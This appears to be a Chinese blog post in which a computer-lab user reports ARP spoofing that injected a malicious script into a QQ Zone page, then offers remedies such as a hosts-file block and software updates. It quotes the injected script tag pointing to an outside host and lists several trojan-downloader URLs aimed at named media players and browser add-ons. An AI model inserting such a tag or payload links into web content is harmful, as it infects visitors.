arp最近似乎有熱起來啦。這幾天人一多就卡,不是一般的卡,QQ上去倒是沒啥問題。就是網頁幾乎就打不開。巨慢!!
昨晚把機子都檢查啦便並且關閉網絡恢復系統。早起又中。
名字不一樣,其中一個是usrinit.exe,我打算用好的userinit.exe去覆蓋中毒的機子。
360arp防火牆打開不時會報警。但沒有ip地址只有mac。這種欺騙性的arp用360arp防火牆根本不起作用似的。
因爲這個機房我就讓這個機子上拉,所以肯定是其他機房也arp啦
打開qq空間已經被掛馬啦。
<script src=http://al.99.vc/1.js></script> <html><head><meta http-equiv=”Content-Type” content=”text/html;charset=gb2312″ /><script>var g_Src_Domain=”u.cnc.qzone.qq.com”,g_iUin=27020287,_s_=new Date(),g_JSON=1;</script><script src=”http://u.cnc.qzone.qq.com/cgi-bin/entry_js.cgi?uin=27020287&r=cnc”></script><script src=”http://cnc.imgcache.qq.com/qzone/G4.1.js”></script><script>if (typeof G41Loaded==”undefined”) location=”http://qzone.qq.com/new_help/error.htm”</script><noscript><img src=”http://cnc.imgcache.qq.com/qzone/noscript.gif”></noscript></html>
其他的站打開都沒問題。剛發現還以爲是騰訊空間有問題呢。急忙讓朋友liu測試下沒有發現我這情況(紅色部分的掛馬代碼)。所以認爲是被其他機房機子arp啦,arp dns!!!
看看放學能不能給別的機房溝通溝通看看。解決問題。
al.99.vc/1.js
這個主要是幾個“圖片”文件(所謂的木馬下載者)!
http://w18.vg/real.gif貌似感染real,
http://w18.vg/ms.gif 種ie7
http://w18.vg/baidu.gif
http://w18.vg/x1.gif
http://w18.vg/lz.gif
http://w18.vg/bf.gif
先留着樣本,閒下來在分析。
忙起來啦在說吧
解決建議:
修改系統盤:C:/WINDOWS/system32/drivers/etc\host(用記事本打開)文件添加這句可以臨時解決再次中這個站的木馬病毒
127.0.0.1 al.99.vc
屏蔽這個網站就可以啦
。。。
http://w18.vg/real.gif貌似感染real,如果你有realone建議卸掉或者去官方下載最新的版本裝上。如果你看到realone不是有錯誤提示說明你的realone有漏洞。
http://w18.vg/ms.gif這個貌似只有ie7纔會被中上。所以建議你打上最新的ie補丁。
http://w18.vg/baidu.gif百度搜霸的漏洞利用,建議直接卸掉就可以啦。或者升級你的搜霸。
http://w18.vg/x1.gif這個已經爲404頁啦不清楚是什麼
http://w18.vg/lz.gif利用的是glchat的漏洞是一個聊天工具
http://w18.vg/bf.gif暴風影音的漏洞利用,建議去下載新的暴風影音
如果個人機子建議打開病毒實時檢測功能。
如果你有更好的建議,謝謝分享。